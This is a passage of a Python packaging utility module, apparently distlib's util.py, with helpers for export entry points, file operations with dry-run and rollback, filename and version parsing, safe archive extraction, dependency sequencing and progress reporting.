    *allowed_chars*; return that letter.  An empty reply falls back to
    *default*; a disallowed reply re-prompts, prefixed with
    *error_prompt* when given.
    """
    current = prompt
    while True:
        reply = raw_input(current)
        current = prompt
        if not reply and default:
            reply = default
        if reply:
            c = reply[0].lower()
            if c in allowed_chars:
                return c
            if error_prompt:
                current = '%c: %s\n%s' % (c, error_prompt, prompt)
def extract_by_key(d, keys):
    """Return a new dict holding only the entries of *d* whose key is in
    *keys*.  *keys* may be an iterable of keys or a single
    whitespace-separated string of key names.
    """
    if isinstance(keys, string_types):
        keys = keys.split()
    return dict((k, d[k]) for k in keys if k in d)
def read_exports(stream):
    """Read an exports mapping {group: {name: export-entry}} from *stream*.

    Tries the JSON metadata layout first and falls back to the legacy
    INI format.  Individual values are parsed with get_export_entry().
    """
    if sys.version_info[0] >= 3:
        # needs to be a text stream
        stream = codecs.getreader('utf-8')(stream)
    # Try to load as JSON, falling back on legacy format
    data = stream.read()
    stream = StringIO(data)
    try:
        jdata = json.load(stream)
        result = jdata['extensions']['python.exports']['exports']
        for group, entries in result.items():
            for k, v in entries.items():
                s = '%s = %s' % (k, v)
                entry = get_export_entry(s)
                assert entry is not None
                entries[k] = entry
        return result
    except Exception:
        # Not JSON -- rewind and parse as an INI file below.
        stream.seek(0, 0)

    def read_stream(cp, stream):
        # ConfigParser.readfp was renamed to read_file in Python 3.2.
        if hasattr(cp, 'read_file'):
            cp.read_file(stream)
        else:
            cp.readfp(stream)

    cp = configparser.ConfigParser()
    try:
        read_stream(cp, stream)
    except configparser.MissingSectionHeaderError:
        # Possibly an indented legacy file: dedent and retry once.
        stream.close()
        data = textwrap.dedent(data)
        stream = StringIO(data)
        read_stream(cp, stream)

    result = {}
    for key in cp.sections():
        result[key] = entries = {}
        for name, value in cp.items(key):
            s = '%s = %s' % (name, value)
            entry = get_export_entry(s)
            assert entry is not None
            #entry.dist = self
            entries[name] = entry
    return result
def write_exports(exports, stream):
    """Serialise an exports mapping {group: {name: entry}} to *stream*
    as an INI file.  Each entry contributes 'name = prefix[:suffix] [flags]'.
    """
    if sys.version_info[0] >= 3:
        # ConfigParser wants text; wrap the binary stream in a UTF-8 writer
        stream = codecs.getwriter('utf-8')(stream)
    cp = configparser.ConfigParser()
    for section, entries in exports.items():
        # TODO check k, v for valid values
        cp.add_section(section)
        for entry in entries.values():
            if entry.suffix is None:
                value = entry.prefix
            else:
                value = '%s:%s' % (entry.prefix, entry.suffix)
            if entry.flags:
                value = '%s [%s]' % (value, ', '.join(entry.flags))
            cp.set(section, entry.name, value)
    cp.write(stream)
@contextlib.contextmanager
def tempdir():
    """Context manager yielding a fresh temp directory, removed on exit."""
    path = tempfile.mkdtemp()
    try:
        yield path
    finally:
        shutil.rmtree(path)
@contextlib.contextmanager
def chdir(d):
    """Temporarily change the working directory to *d*."""
    saved = os.getcwd()
    try:
        os.chdir(d)
        yield
    finally:
        os.chdir(saved)
@contextlib.contextmanager
def socket_timeout(seconds=15):
    """Temporarily set the process-wide default socket timeout."""
    saved = socket.getdefaulttimeout()
    try:
        socket.setdefaulttimeout(seconds)
        yield
    finally:
        socket.setdefaulttimeout(saved)
class cached_property(object):
    """Descriptor that computes a value on first access and caches it on
    the instance, so later lookups bypass the descriptor entirely.
    """
    def __init__(self, func):
        self.func = func

    def __get__(self, obj, cls=None):
        if obj is None:
            # accessed on the class: return the descriptor itself
            return self
        value = self.func(obj)
        # shadow the descriptor with the computed value on the instance
        object.__setattr__(obj, self.func.__name__, value)
        return value
def convert_path(pathname):
    """Return 'pathname' as a name that will work on the native filesystem.

    The path is split on '/' and put back together again using the current
    directory separator. Needed because filenames in the setup script are
    always supplied in Unix style, and have to be converted to the local
    convention before we can actually use them in the filesystem. Raises
    ValueError on non-Unix-ish systems if 'pathname' either starts or
    ends with a slash.
    """
    if os.sep == '/':
        return pathname
    if not pathname:
        return pathname
    if pathname[0] == '/':
        raise ValueError("path '%s' cannot be absolute" % pathname)
    if pathname[-1] == '/':
        raise ValueError("path '%s' cannot end with '/'" % pathname)
    # drop '.' components, then rejoin with the native separator
    components = [part for part in pathname.split('/') if part != os.curdir]
    if not components:
        return os.curdir
    return os.path.join(*components)
class FileOperator(object):
    """Perform file-system operations (copy, write, mkdir, byte-compile,
    remove) honouring a dry-run flag, with optional recording of the
    files/directories created so changes can be committed or rolled back.
    """
    def __init__(self, dry_run=False):
        # When dry_run is True, operations are logged but not performed.
        self.dry_run = dry_run
        # Directories already known to exist (or created) - see ensure_dir.
        self.ensured = set()
        self._init_record()
    def _init_record(self):
        # Recording is off until a caller sets self.record = True.
        self.record = False
        self.files_written = set()
        self.dirs_created = set()
    def record_as_written(self, path):
        """Remember *path* as written, if recording is enabled."""
        if self.record:
            self.files_written.add(path)
    def newer(self, source, target):
        """Tell if the target is newer than the source.
        Returns true if 'source' exists and is more recently modified than
        'target', or if 'source' exists and 'target' doesn't.
        Returns false if both exist and 'target' is the same age or younger
        than 'source'. Raises DistlibException if 'source' does not exist.
        Note that this test is not very accurate: files created in the same
        second will have the same "age".
        """
        if not os.path.exists(source):
            raise DistlibException("file '%r' does not exist" %
                                   os.path.abspath(source))
        if not os.path.exists(target):
            return True
        return os.stat(source).st_mtime > os.stat(target).st_mtime
    def copy_file(self, infile, outfile, check=True):
        """Copy a file respecting dry-run and force flags.
        """
        self.ensure_dir(os.path.dirname(outfile))
        logger.info('Copying %s to %s', infile, outfile)
        if not self.dry_run:
            msg = None
            if check:
                # Refuse to clobber symlinks or non-regular files.
                if os.path.islink(outfile):
                    msg = '%s is a symlink' % outfile
                elif os.path.exists(outfile) and not os.path.isfile(outfile):
                    msg = '%s is a non-regular file' % outfile
            if msg:
                raise ValueError(msg + ' which would be overwritten')
            shutil.copyfile(infile, outfile)
        self.record_as_written(outfile)
    def copy_stream(self, instream, outfile, encoding=None):
        """Copy the contents of *instream* to the file *outfile*.
        With no encoding the stream is copied as bytes; otherwise the
        output file is opened as text with that encoding."""
        assert not os.path.isdir(outfile)
        self.ensure_dir(os.path.dirname(outfile))
        logger.info('Copying stream %s to %s', instream, outfile)
        if not self.dry_run:
            if encoding is None:
                outstream = open(outfile, 'wb')
            else:
                outstream = codecs.open(outfile, 'w', encoding=encoding)
            try:
                shutil.copyfileobj(instream, outstream)
            finally:
                outstream.close()
        self.record_as_written(outfile)
    def write_binary_file(self, path, data):
        """Write *data* (bytes) to *path*, creating parent dirs as needed."""
        self.ensure_dir(os.path.dirname(path))
        if not self.dry_run:
            with open(path, 'wb') as f:
                f.write(data)
        self.record_as_written(path)
    def write_text_file(self, path, data, encoding):
        """Write *data* (text) to *path* encoded with *encoding*."""
        self.ensure_dir(os.path.dirname(path))
        if not self.dry_run:
            with open(path, 'wb') as f:
                f.write(data.encode(encoding))
        self.record_as_written(path)
    def set_mode(self, bits, mask, files):
        """OR *bits* into each file's mode, then AND with *mask* (POSIX only)."""
        if os.name == 'posix' or (os.name == 'java' and os._name == 'posix'):
            # Set the executable bits (owner, group, and world) on
            # all the files specified.
            for f in files:
                if self.dry_run:
                    logger.info("changing mode of %s", f)
                else:
                    mode = (os.stat(f).st_mode | bits) & mask
                    logger.info("changing mode of %s to %o", f, mode)
                    os.chmod(f, mode)
    # Convenience wrapper: mark files r-x for everyone (0o555), preserving
    # any other permission bits already set.
    set_executable_mode = lambda s, f: s.set_mode(0o555, 0o7777, f)
    def ensure_dir(self, path):
        """Create *path* (and any missing parents), remembering what was
        made so repeated calls are cheap and rollback can undo them."""
        path = os.path.abspath(path)
        if path not in self.ensured and not os.path.exists(path):
            self.ensured.add(path)
            d, f = os.path.split(path)
            self.ensure_dir(d)
            logger.info('Creating %s' % path)
            if not self.dry_run:
                os.mkdir(path)
            if self.record:
                self.dirs_created.add(path)
    def byte_compile(self, path, optimize=False, force=False, prefix=None):
        """Byte-compile *path* to its __pycache__ location and return the
        compiled file's path. *prefix*, if given, is stripped from the
        path reported in compile errors."""
        dpath = cache_from_source(path, not optimize)
        logger.info('Byte-compiling %s to %s', path, dpath)
        if not self.dry_run:
            if force or self.newer(path, dpath):
                if not prefix:
                    diagpath = None
                else:
                    assert path.startswith(prefix)
                    diagpath = path[len(prefix):]
            py_compile.compile(path, dpath, diagpath, True)     # raise error
        self.record_as_written(dpath)
        return dpath
    def ensure_removed(self, path):
        """Remove a file, link or directory tree if it exists, updating
        the recording sets accordingly."""
        if os.path.exists(path):
            if os.path.isdir(path) and not os.path.islink(path):
                logger.debug('Removing directory tree at %s', path)
                if not self.dry_run:
                    shutil.rmtree(path)
                if self.record:
                    if path in self.dirs_created:
                        self.dirs_created.remove(path)
            else:
                if os.path.islink(path):
                    s = 'link'
                else:
                    s = 'file'
                logger.debug('Removing %s %s', s, path)
                if not self.dry_run:
                    os.remove(path)
                if self.record:
                    if path in self.files_written:
                        self.files_written.remove(path)
    def is_writable(self, path):
        """Return True if *path* (or its nearest existing ancestor) is
        writable by the current user."""
        result = False
        while not result:
            if os.path.exists(path):
                result = os.access(path, os.W_OK)
                break
            parent = os.path.dirname(path)
            if parent == path:
                # Reached the filesystem root without finding anything.
                break
            path = parent
        return result
    def commit(self):
        """
        Commit recorded changes, turn off recording, return
        changes.
        """
        assert self.record
        result = self.files_written, self.dirs_created
        self._init_record()
        return result
    def rollback(self):
        """Undo recorded changes: delete written files and the created
        directories (which should be empty by then)."""
        if not self.dry_run:
            for f in list(self.files_written):
                if os.path.exists(f):
                    os.remove(f)
            # dirs should all be empty now, except perhaps for
            # __pycache__ subdirs
            # reverse so that subdirs appear before their parents
            dirs = sorted(self.dirs_created, reverse=True)
            for d in dirs:
                flist = os.listdir(d)
                if flist:
                    assert flist == ['__pycache__']
                    sd = os.path.join(d, flist[0])
                    os.rmdir(sd)
                os.rmdir(d)     # should fail if non-empty
        self._init_record()
def resolve(module_name, dotted_path):
    """Import *module_name* and resolve *dotted_path* within it.

    :param module_name: The (possibly dotted) name of a module to import.
    :param dotted_path: A dotted attribute path inside the module, or
                        None to return the module itself.
    :return: The resolved module or attribute.
    """
    if module_name in sys.modules:
        mod = sys.modules[module_name]
    else:
        mod = __import__(module_name)
        # Bug fix: for a dotted module name, __import__ returns the
        # *top-level* package, not the submodule. After a successful
        # import the submodule is guaranteed to be in sys.modules.
        if '.' in module_name:
            mod = sys.modules[module_name]
    if dotted_path is None:
        result = mod
    else:
        parts = dotted_path.split('.')
        result = getattr(mod, parts.pop(0))
        for p in parts:
            result = getattr(result, p)
    return result
class ExportEntry(object):
    """A parsed export/entry-point: ``name = prefix:suffix [flags]``."""
    def __init__(self, name, prefix, suffix, flags):
        # name: export name; prefix: module path; suffix: dotted attribute
        # path within the module (or None); flags: list of flag strings.
        self.name = name
        self.prefix = prefix
        self.suffix = suffix
        self.flags = flags
    @cached_property
    def value(self):
        """Resolve (and cache) the object this entry refers to."""
        return resolve(self.prefix, self.suffix)
    def __repr__(self):  # pragma: no cover
        return '<ExportEntry %s = %s:%s %s>' % (self.name, self.prefix,
                                                self.suffix, self.flags)
    def __eq__(self, other):
        # Value equality over all four fields; non-ExportEntry compares unequal.
        if not isinstance(other, ExportEntry):
            result = False
        else:
            result = (self.name == other.name and
                      self.prefix == other.prefix and
                      self.suffix == other.suffix and
                      self.flags == other.flags)
        return result
    # Keep identity-based hashing even though __eq__ is defined.
    __hash__ = object.__hash__
ENTRY_RE = re.compile(r'''(?P<name>(\w|[-.+])+)
\s*=\s*(?P<callable>(\w+)([:\.]\w+)*)
\s*(\[\s*(?P<flags>\w+(=\w+)?(,\s*\w+(=\w+)?)*)\s*\])?
''', re.VERBOSE)
def get_export_entry(specification):
    """Parse 'name = prefix:suffix [flags]' into an ExportEntry.

    Returns None when *specification* doesn't match the pattern at all,
    and raises DistlibException when it is recognisably malformed (stray
    brackets, or more than one ':' in the callable part).
    """
    m = ENTRY_RE.search(specification)
    if not m:
        result = None
        # No match: brackets present without a parsed flags section
        # indicate a malformed specification rather than a non-export.
        if '[' in specification or ']' in specification:
            raise DistlibException("Invalid specification "
                                   "'%s'" % specification)
    else:
        d = m.groupdict()
        name = d['name']
        path = d['callable']
        colons = path.count(':')
        if colons == 0:
            # Module only - no attribute path within it.
            prefix, suffix = path, None
        else:
            if colons != 1:
                raise DistlibException("Invalid specification "
                                       "'%s'" % specification)
            prefix, suffix = path.split(':')
        flags = d['flags']
        if flags is None:
            # Brackets with no matched flags group -> syntax error.
            if '[' in specification or ']' in specification:
                raise DistlibException("Invalid specification "
                                       "'%s'" % specification)
            flags = []
        else:
            flags = [f.strip() for f in flags.split(',')]
        result = ExportEntry(name, prefix, suffix, flags)
    return result
def get_cache_base(suffix=None):
    """
    Return the default base location for distlib caches. If the directory does
    not exist, it is created. Use the suffix provided for the base directory,
    and default to '.distlib' if it isn't provided.

    On Windows, if LOCALAPPDATA is defined in the environment, then it is
    assumed to be a directory, and will be the parent directory of the result.
    On POSIX, and on Windows if LOCALAPPDATA is not defined, the user's home
    directory - using os.expanduser('~') - will be the parent directory of
    the result.

    The result is just the directory '.distlib' in the parent directory as
    determined above, or with the name specified with ``suffix``.
    """
    if suffix is None:
        suffix = '.distlib'
    if os.name == 'nt' and 'LOCALAPPDATA' in os.environ:
        # Windows env-var lookups are case-insensitive, so '$localappdata'
        # expands the same as '$LOCALAPPDATA'.
        result = os.path.expandvars('$localappdata')
    else:
        # Assume posix, or old Windows
        result = os.path.expanduser('~')
    # we use 'isdir' instead of 'exists', because we want to
    # fail if there's a file with that name
    if os.path.isdir(result):
        usable = os.access(result, os.W_OK)
        if not usable:
            logger.warning('Directory exists but is not writable: %s', result)
    else:
        try:
            os.makedirs(result)
            usable = True
        except OSError:
            logger.warning('Unable to create %s', result, exc_info=True)
            usable = False
    if not usable:
        # Fall back to a throwaway temp dir rather than failing outright.
        result = tempfile.mkdtemp()
        logger.warning('Default location unusable, using %s', result)
    return os.path.join(result, suffix)
def path_to_cache_dir(path):
    """
    Convert an absolute path to a directory name for use in a cache.

    The algorithm used is:

    #. On Windows, any ``':'`` in the drive is replaced with ``'---'``.
    #. Any occurrence of ``os.sep`` is replaced with ``'--'``.
    #. ``'.cache'`` is appended.
    """
    drive, tail = os.path.splitdrive(os.path.abspath(path))
    if drive:
        drive = drive.replace(':', '---')
    return drive + tail.replace(os.sep, '--') + '.cache'
def ensure_slash(s):
    """Return *s* with a '/' appended, unless it already ends with one."""
    return s if s.endswith('/') else s + '/'
def parse_credentials(netloc):
    """Split a URL netloc into (username, password, host-part).

    Returns (None, None, netloc) when no userinfo is present; password is
    None when the userinfo has no ':'.
    """
    username = password = None
    if '@' in netloc:
        # Bug fix: split on the *last* '@' so userinfo containing '@'
        # (e.g. an email-style username or a password with '@') is
        # attributed to the credentials, not the host.
        prefix, netloc = netloc.rsplit('@', 1)
        if ':' not in prefix:
            username = prefix
        else:
            username, password = prefix.split(':', 1)
    return username, password, netloc
def get_process_umask():
    """Return the current process umask.

    os.umask can only be read by setting it, so a throwaway value is set
    and the original is immediately restored.
    """
    current = os.umask(0o22)
    os.umask(current)
    return current
def is_string_sequence(seq):
    """Return True if every element of *seq* is a string.

    NOTE(review): an empty *seq* trips the assertion below - callers
    appear expected to pass at least one element; confirm before relying
    on this with empty input.
    """
    result = True
    i = None
    for i, s in enumerate(seq):
        if not isinstance(s, string_types):
            result = False
            break
    assert i is not None
    return result
# Dist filenames look like '<name>-<version>'; matched case-insensitively.
PROJECT_NAME_AND_VERSION = re.compile('([a-z0-9_]+([.-][a-z_][a-z0-9_]*)*)-'
                                      '([a-z0-9_.+-]+)', re.I)
# Trailing '-pyX[.Y]' marker naming the Python version a dist targets.
PYTHON_VERSION = re.compile(r'-py(\d\.?\d?)')
def split_filename(filename, project_name=None):
    """
    Extract name, version, python version from a filename (no extension)

    Return name, version, pyver or None
    """
    result = None
    pyver = None
    # Some archives use spaces; normalise to the '-' convention.
    filename = unquote(filename).replace(' ', '-')
    m = PYTHON_VERSION.search(filename)
    if m:
        pyver = m.group(1)
        filename = filename[:m.start()]
    if project_name and len(filename) > len(project_name) + 1:
        # Prefer an exact project-name prefix match when one is supplied.
        m = re.match(re.escape(project_name) + r'\b', filename)
        if m:
            n = m.end()
            result = filename[:n], filename[n + 1:], pyver
    if result is None:
        # Fall back to the generic name-version pattern.
        m = PROJECT_NAME_AND_VERSION.match(filename)
        if m:
            result = m.group(1), m.group(3), pyver
    return result
# Allow spaces in name because of legacy dists like "Twisted Core"
NAME_VERSION_RE = re.compile(r'(?P<name>[\w .-]+)\s*'
                             r'\(\s*(?P<ver>[^\s)]+)\)$')
def parse_name_and_version(p):
    """
    A utility method used to get name and version from a string.

    From e.g. a Provides-Dist value.

    :param p: A value in a form 'foo (1.0)'
    :return: The name and version as a tuple.
    :raises DistlibException: if *p* doesn't match the expected form.
    """
    m = NAME_VERSION_RE.match(p)
    if not m:
        raise DistlibException('Ill-formed name/version string: \'%s\'' % p)
    d = m.groupdict()
    # Name is normalised to lower case; version is returned verbatim.
    return d['name'].strip().lower(), d['ver']
def get_extras(requested, available):
    """Compute the effective set of extras from *requested*, given the
    *available* ones. '*' selects everything available; a '-name' entry
    deselects; unknown extras are warned about but still honoured."""
    selected = set()
    wanted = set(requested or [])
    offered = set(available or [])
    if '*' in wanted:
        wanted.remove('*')
        selected |= offered
    for item in wanted:
        if item == '-':
            # A bare '-' is kept literally.
            selected.add(item)
        elif item.startswith('-'):
            name = item[1:]
            if name not in offered:
                logger.warning('undeclared extra: %s' % name)
            selected.discard(name)
        else:
            if item not in offered:
                logger.warning('undeclared extra: %s' % item)
            selected.add(item)
    return selected
#
# Extended metadata functionality
#
def _get_external_data(url):
    """Fetch and parse JSON metadata from *url*.

    Returns {} on any failure; network/parse errors are logged, never
    raised, so callers can treat the result as best-effort.
    """
    result = {}
    try:
        # urlopen might fail if it runs into redirections,
        # because of Python issue #13696. Fixed in locators
        # using a custom redirect handler.
        resp = urlopen(url)
        headers = resp.info()
        ct = headers.get('Content-Type')
        if not ct.startswith('application/json'):
            logger.debug('Unexpected response for JSON request: %s', ct)
        else:
            reader = codecs.getreader('utf-8')(resp)
            #data = reader.read().decode('utf-8')
            #result = json.loads(data)
            result = json.load(reader)
    except Exception as e:
        logger.exception('Failed to get external data for %s: %s', url, e)
    return result
# Base URL of the externally hosted JSON metadata mirror.
_external_data_base_url = 'https://www.red-dove.com/pypi/projects/'
def get_project_data(name):
    """Fetch project-level JSON metadata for *name* (network access;
    returns {} on failure)."""
    # Projects are sharded by upper-cased first letter: F/Foo/project.json.
    url = '%s/%s/project.json' % (name[0].upper(), name)
    url = urljoin(_external_data_base_url, url)
    result = _get_external_data(url)
    return result
def get_package_data(name, version):
    """Fetch version-specific JSON metadata for *name* (network access;
    returns {} on failure)."""
    url = '%s/%s/package-%s.json' % (name[0].upper(), name, version)
    url = urljoin(_external_data_base_url, url)
    return _get_external_data(url)
class Cache(object):
    """
    A class implementing a cache for resources that need to live in the file system
    e.g. shared libraries. This class was moved from resources to here because it
    could be used by other modules, e.g. the wheel module.
    """
    def __init__(self, base):
        """
        Initialise an instance.

        :param base: The base directory where the cache should be located.
        """
        # we use 'isdir' instead of 'exists', because we want to
        # fail if there's a file with that name
        if not os.path.isdir(base):  # pragma: no cover
            os.makedirs(base)
        # Warn if group/other permission bits are set on the cache dir.
        if (os.stat(base).st_mode & 0o77) != 0:
            logger.warning('Directory \'%s\' is not private', base)
        self.base = os.path.abspath(os.path.normpath(base))
    def prefix_to_dir(self, prefix):
        """
        Converts a resource prefix to a directory name in the cache.
        """
        return path_to_cache_dir(prefix)
    def clear(self):
        """
        Clear the cache, returning the paths that could not be removed.
        """
        not_removed = []
        for fn in os.listdir(self.base):
            fn = os.path.join(self.base, fn)
            try:
                if os.path.islink(fn) or os.path.isfile(fn):
                    os.remove(fn)
                elif os.path.isdir(fn):
                    shutil.rmtree(fn)
            except Exception:
                # Best-effort: collect failures rather than aborting.
                not_removed.append(fn)
        return not_removed
class EventMixin(object):
    """
    A very simple publish/subscribe system.
    """
    def __init__(self):
        # Maps event name -> deque of subscribers, in call order.
        self._subscribers = {}

    def add(self, event, subscriber, append=True):
        """
        Add a subscriber for an event.

        :param event: The name of an event.
        :param subscriber: The subscriber to be added (and called when the
                           event is published).
        :param append: Whether to append or prepend the subscriber to an
                       existing subscriber list for the event.
        """
        registry = self._subscribers
        if event not in registry:
            registry[event] = deque([subscriber])
        else:
            queue = registry[event]
            if append:
                queue.append(subscriber)
            else:
                queue.appendleft(subscriber)

    def remove(self, event, subscriber):
        """
        Remove a subscriber for an event.

        :param event: The name of an event.
        :param subscriber: The subscriber to be removed.
        """
        registry = self._subscribers
        if event not in registry:
            raise ValueError('No subscribers: %r' % event)
        registry[event].remove(subscriber)

    def get_subscribers(self, event):
        """
        Return an iterator for the subscribers for an event.

        :param event: The event to return subscribers for.
        """
        return iter(self._subscribers.get(event, ()))

    def publish(self, event, *args, **kwargs):
        """
        Publish a event and return a list of values returned by its
        subscribers.

        :param event: The event to publish.
        :param args: The positional arguments to pass to the event's
                     subscribers.
        :param kwargs: The keyword arguments to pass to the event's
                       subscribers.
        """
        results = []
        for listener in self.get_subscribers(event):
            try:
                outcome = listener(event, *args, **kwargs)
            except Exception:
                # A failing subscriber must not break the others.
                logger.exception('Exception during event publication')
                outcome = None
            results.append(outcome)
        logger.debug('publish %s: args = %s, kwargs = %s, result = %s',
                     event, args, kwargs, results)
        return results
#
# Simple sequencing
#
class Sequencer(object):
    """Record ordering constraints (pred must run before succ) between
    steps and answer ordering queries; also exposes Tarjan's strongly
    connected components (for cycle detection) and a Graphviz dump."""
    def __init__(self):
        self._preds = {}
        self._succs = {}
        self._nodes = set()     # nodes with no preds/succs
    def add_node(self, node):
        """Register a standalone node with no edges."""
        self._nodes.add(node)
    def remove_node(self, node, edges=False):
        """Remove a standalone node; with edges=True also remove every
        constraint mentioning it."""
        if node in self._nodes:
            self._nodes.remove(node)
        if edges:
            for p in set(self._preds.get(node, ())):
                self.remove(p, node)
            for s in set(self._succs.get(node, ())):
                self.remove(node, s)
            # Remove empties
            for k, v in list(self._preds.items()):
                if not v:
                    del self._preds[k]
            for k, v in list(self._succs.items()):
                if not v:
                    del self._succs[k]
    def add(self, pred, succ):
        """Add the constraint that *pred* must come before *succ*."""
        assert pred != succ
        self._preds.setdefault(succ, set()).add(pred)
        self._succs.setdefault(pred, set()).add(succ)
    def remove(self, pred, succ):
        """Remove the pred -> succ constraint."""
        assert pred != succ
        try:
            preds = self._preds[succ]
            succs = self._succs[pred]
        except KeyError:  # pragma: no cover
            raise ValueError('%r not a successor of anything' % succ)
        try:
            preds.remove(pred)
            succs.remove(succ)
        except KeyError:  # pragma: no cover
            raise ValueError('%r not a successor of %r' % (succ, pred))
    def is_step(self, step):
        """Return True if *step* is known to this sequencer."""
        return (step in self._preds or step in self._succs or
                step in self._nodes)
    def get_steps(self, final):
        """Return the steps needed to reach *final*, in execution order."""
        if not self.is_step(final):
            raise ValueError('Unknown: %r' % final)
        result = []
        todo = []
        seen = set()
        todo.append(final)
        while todo:
            step = todo.pop(0)
            if step in seen:
                # if a step was already seen,
                # move it to the end (so it will appear earlier
                # when reversed on return) ... but not for the
                # final step, as that would be confusing for
                # users
                if step != final:
                    result.remove(step)
                    result.append(step)
            else:
                seen.add(step)
                result.append(step)
                preds = self._preds.get(step, ())
                todo.extend(preds)
        return reversed(result)
    @property
    def strong_connections(self):
        # Tarjan's algorithm; each returned tuple is one SCC. Components
        # larger than one node indicate a dependency cycle.
        #http://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm
        index_counter = [0]
        stack = []
        lowlinks = {}
        index = {}
        result = []
        graph = self._succs
        def strongconnect(node):
            # set the depth index for this node to the smallest unused index
            index[node] = index_counter[0]
            lowlinks[node] = index_counter[0]
            index_counter[0] += 1
            stack.append(node)
            # Consider successors
            try:
                successors = graph[node]
            except Exception:
                successors = []
            for successor in successors:
                if successor not in lowlinks:
                    # Successor has not yet been visited
                    strongconnect(successor)
                    lowlinks[node] = min(lowlinks[node],lowlinks[successor])
                elif successor in stack:
                    # the successor is in the stack and hence in the current
                    # strongly connected component (SCC)
                    lowlinks[node] = min(lowlinks[node],index[successor])
            # If `node` is a root node, pop the stack and generate an SCC
            if lowlinks[node] == index[node]:
                connected_component = []
                while True:
                    successor = stack.pop()
                    connected_component.append(successor)
                    if successor == node: break
                component = tuple(connected_component)
                # storing the result
                result.append(component)
        for node in graph:
            if node not in lowlinks:
                strongconnect(node)
        return result
    @property
    def dot(self):
        """Render the constraint graph in Graphviz dot format."""
        result = ['digraph G {']
        for succ in self._preds:
            preds = self._preds[succ]
            for pred in preds:
                result.append('  %s -> %s;' % (pred, succ))
        for node in self._nodes:
            result.append('  %s;' % node)
        result.append('}')
        return '\n'.join(result)
#
# Unarchiving functionality for zip, tar, tgz, tbz, whl
#
# Archive suffixes understood by unarchive() below.
ARCHIVE_EXTENSIONS = ('.tar.gz', '.tar.bz2', '.tar', '.zip',
                      '.tgz', '.tbz', '.whl')
def unarchive(archive_filename, dest_dir, format=None, check=True):
    """Unpack *archive_filename* into *dest_dir*.

    :param archive_filename: Path to a .zip/.whl/.tar[.gz|.bz2]/.tgz/.tbz
                             archive.
    :param dest_dir: The destination directory.
    :param format: One of 'zip', 'tgz', 'tbz', 'tar', or None to infer the
                   format from the filename.
    :param check: If true, reject member paths that would escape dest_dir.
    :raises ValueError: for unknown formats or unsafe member paths.
    """
    # tarfile.open mode string for each tar-based format.
    tar_modes = {'tgz': 'r:gz', 'tbz': 'r:bz2', 'tar': 'r'}

    def check_path(path):
        # Guard against absolute or '..'-style members escaping dest_dir.
        if not isinstance(path, text_type):
            path = path.decode('utf-8')
        p = os.path.abspath(os.path.join(dest_dir, path))
        # len(p) == plen means the member resolves to dest_dir itself,
        # which is safe (the previous code raised IndexError there).
        if not p.startswith(dest_dir) or (len(p) > plen and p[plen] != os.sep):
            raise ValueError('path outside destination: %r' % p)

    dest_dir = os.path.abspath(dest_dir)
    plen = len(dest_dir)
    archive = None
    if format is None:
        if archive_filename.endswith(('.zip', '.whl')):
            format = 'zip'
        elif archive_filename.endswith(('.tar.gz', '.tgz')):
            format = 'tgz'
        elif archive_filename.endswith(('.tar.bz2', '.tbz')):
            format = 'tbz'
        elif archive_filename.endswith('.tar'):
            format = 'tar'
        else:  # pragma: no cover
            raise ValueError('Unknown format for %r' % archive_filename)
    try:
        if format == 'zip':
            archive = ZipFile(archive_filename, 'r')
            if check:
                names = archive.namelist()
                for name in names:
                    check_path(name)
        else:
            # Bug fix: 'mode' used to be assigned only when the format was
            # inferred from the filename, so an explicitly passed tar
            # format (e.g. format='tgz') raised NameError here.
            if format not in tar_modes:
                raise ValueError('Unknown format for %r' % archive_filename)
            archive = tarfile.open(archive_filename, tar_modes[format])
            if check:
                names = archive.getnames()
                for name in names:
                    check_path(name)
        if format != 'zip' and sys.version_info[0] < 3:
            # See Python issue 17153. If the dest path contains Unicode,
            # tarfile extraction fails on Python 2.x if a member path name
            # contains non-ASCII characters - it leads to an implicit
            # bytes -> unicode conversion using ASCII to decode.
            for tarinfo in archive.getmembers():
                if not isinstance(tarinfo.name, text_type):
                    tarinfo.name = tarinfo.name.decode('utf-8')
        archive.extractall(dest_dir)
    finally:
        if archive:
            archive.close()
def zip_dir(directory):
    """zip a directory tree into a BytesIO object"""
    buf = io.BytesIO()
    base_len = len(directory)
    with ZipFile(buf, "w") as zf:
        for root, _dirs, filenames in os.walk(directory):
            for filename in filenames:
                source = os.path.join(root, filename)
                # Archive names are relative to *directory*.
                arcname = os.path.join(root[base_len:], filename)
                zf.write(source, arcname)
    return buf
#
# Simple progress bar
#
# Unit prefixes for the human-readable transfer speed (see Progress.speed).
UNITS = ('', 'K', 'M', 'G','T','P')
class Progress(object):
    """Track the progress of a long operation: current/min/max values,
    elapsed time, percentage, ETA and transfer speed."""
    unknown = 'UNKNOWN'
    def __init__(self, minval=0, maxval=100):
        # maxval=None means the total is unknown (indeterminate progress).
        assert maxval is None or maxval >= minval
        self.min = self.cur = minval
        self.max = maxval
        self.started = None
        self.elapsed = 0
        self.done = False
    def update(self, curval):
        """Record a new current value and refresh the elapsed time."""
        assert self.min <= curval
        assert self.max is None or curval <= self.max
        self.cur = curval
        now = time.time()
        if self.started is None:
            self.started = now
        else:
            self.elapsed = now - self.started
    def increment(self, incr):
        """Advance the current value by *incr* (must be non-negative)."""
        assert incr >= 0
        self.update(self.cur + incr)
    def start(self):
        """Mark the start of the operation; returns self for chaining."""
        self.update(self.min)
        return self
    def stop(self):
        """Mark completion, snapping the current value to the maximum."""
        if self.max is not None:
            self.update(self.max)
        self.done = True
    @property
    def maximum(self):
        # 'UNKNOWN' when the total is indeterminate.
        return self.unknown if self.max is None else self.max
    @property
    def percentage(self):
        """Progress rendered as a 5-character string like ' 42 %'."""
        if self.done:
            result = '100 %'
        elif self.max is None:
            result = ' ?? %'
        else:
            v = 100.0 * (self.cur - self.min) / (self.max - self.min)
            result = '%3d %%' % v
        return result
    def format_duration(self, duration):
        # NOTE(review): 'and' binds tighter than 'or', so this groups as
        # (duration <= 0 and self.max is None) or self.cur == self.min -
        # confirm that grouping is intended.
        if (duration <= 0) and self.max is None or self.cur == self.min:
            result = '??:??:??'
        #elif duration < 1:
        #    result = '--:--:--'
        else:
            result = time.strftime('%H:%M:%S', time.gmtime(duration))
        return result
    @property
    def ETA(self):
        """Estimated time remaining (or total elapsed time when done)."""
        if self.done:
            prefix = 'Done'
            t = self.elapsed
            #import pdb; pdb.set_trace()
        else:
            prefix = 'ETA '
            if self.max is None:
                t = -1
            elif self.elapsed == 0 or (self.cur == self.min):
                t = 0
            else:
                #import pdb; pdb.set_trace()
                # Linear extrapolation from the work completed so far.
